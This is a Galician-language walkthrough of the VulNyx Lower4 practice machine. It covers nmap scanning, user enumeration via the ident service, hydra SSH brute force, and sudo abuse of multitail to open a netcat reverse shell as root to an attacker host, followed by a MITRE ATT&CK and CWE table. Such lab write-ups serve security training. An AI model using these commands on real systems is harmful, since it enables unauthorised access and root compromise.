Ir ao contido

Lower4

Máquina virtual Lower4

Fig. VulNyx Lower4
Fig. Card VulNyx Lower4

A máquina Lower4 é moi interesante porque...

  • Servizo ident (porto 113) para enumeración de usuarios
  • Brute-force SSH estándar
  • multitail con opción -l que permite executar comandos
  • Reverse shell directa como root mediante multitail

Diagrama de ataque

Fig. Diagrama de ataque

Fase 1 — Recopilación

sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Lower4 -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sT -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Lower4 # 22,80,113
whatweb IP_VulNyx_Lower4

Fase 2 — Análise

# Porto 113 → ident (servizo de identificación)
# Enumeración de usuarios mediante nmap e ident
sudo nmap -p113 -sCV -Pn -vvvv IP_VulNyx_Lower4
# Usuario identificado: [usuario]

Fase 3 — Explotación

# Ataque de forza bruta SSH ao usuario [usuario]
hydra -l [usuario] -P /usr/share/wordlists/rockyou.txt IP_VulNyx_Lower4 ssh
# Contrasinal atopada

# Acceso SSH
ssh [usuario]@IP_VulNyx_Lower4
# ⇒ Conseguimos consola de usuario [usuario] (flag user.txt)

Fase 4 — Post‑explotación

# Enumeración de permisos sudo
sudo -l
# User [usuario] may run the following commands on lower4:
#     (root) NOPASSWD: /usr/bin/multitail

# Consulta en GTFOBins(https://gtfobins.github.io/) e documentación de multitail
# multitail permite executar comandos mediante a opción -l

# Preparamos listener no atacante
nc -nlvp 443

# Explotación de multitail con sudo
sudo /usr/bin/multitail /etc/passwd -l "nc -e /bin/bash IP_Atacante 443"
# ⇒ Obtemos reverse shell de root

# Verificación
whoami # root
cd /root
cat root.txt # ⇒ Flag de root conseguida

Correspondencia de fases → MITRE ATT&CK — VulNyx: Lower4

Fase Acción / Resumo Vector principal MITRE ATT&CK (IDs) CWE(s) (relevantes)
1. Recopilación Descubrimento de host e servizos expostos Scanning / descubrimento de servizos T1595 — Active Scanning
T1046 — Network Service Discovery		 CWE-200 — Information Exposure (reconnaissance)
2. Análise Enumeración de usuarios mediante servizo ident User enumeration via ident T1087 — Account Discovery
T1592 — Gather Victim Host Information		 CWE-200 — Information Exposure; CWE-359 — Exposure of Private Personal Information
3. Explotación Ataque de forza bruta SSH Brute-force de credenciais T1110.001 — Brute Force: Password Guessing
T1021.004 — Remote Services: SSH		 CWE-521 — Weak Password Requirements; CWE-307 — Improper Restriction of Excessive Authentication Attempts
4. Post-explotación Enumeración de permisos sudo Discovery local T1069 — Permission Groups Discovery
T1083 — File and Directory Discovery		 CWE-200 — Information Exposure
Abuso de multitail con sudo para escalada de privilexios Command execution via multitail T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching
T1059.004 — Command and Scripting Interpreter: Unix Shell		 CWE-269 — Improper Privilege Management; CWE-284 — Improper Access Control